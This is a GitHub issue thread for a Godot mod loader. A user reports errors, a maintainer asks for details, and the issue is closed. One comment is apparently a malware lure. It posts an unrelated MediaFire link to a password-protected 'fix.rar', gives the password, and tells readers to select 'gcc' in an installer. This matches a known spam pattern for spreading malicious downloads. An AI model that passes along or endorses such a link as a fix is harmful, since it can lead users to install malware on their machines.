### ISSUE TITLE
why is my godot giving me errors

### ISSUE THREAD

**Issue by Galaxy1T-Codes** [GodotModding/godot-mod-loader#409]
when i put it on autoload and let i play the game it gives me alot of errors

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by KANAjetzt** [comment]
Hi, thanks for reporting the issue. We will need a bit more information to assist you. You can take a look at the [Godot Issue Template](https://github.com/godotengine/godot/blob/master/.github/ISSUE_TEMPLATE/bug_report.yml) to get an idea of what information we need.

A good start would be to share the errors you get.

**Comment by Galaxy1T-Codes** [comment]
thx but i dont care about it anymore atleast for now i think

**Comment by ZackeryRSmith** [comment]
Seeing as @Galaxy1T-Codes no longer cares about this issue I am going to close it for now.
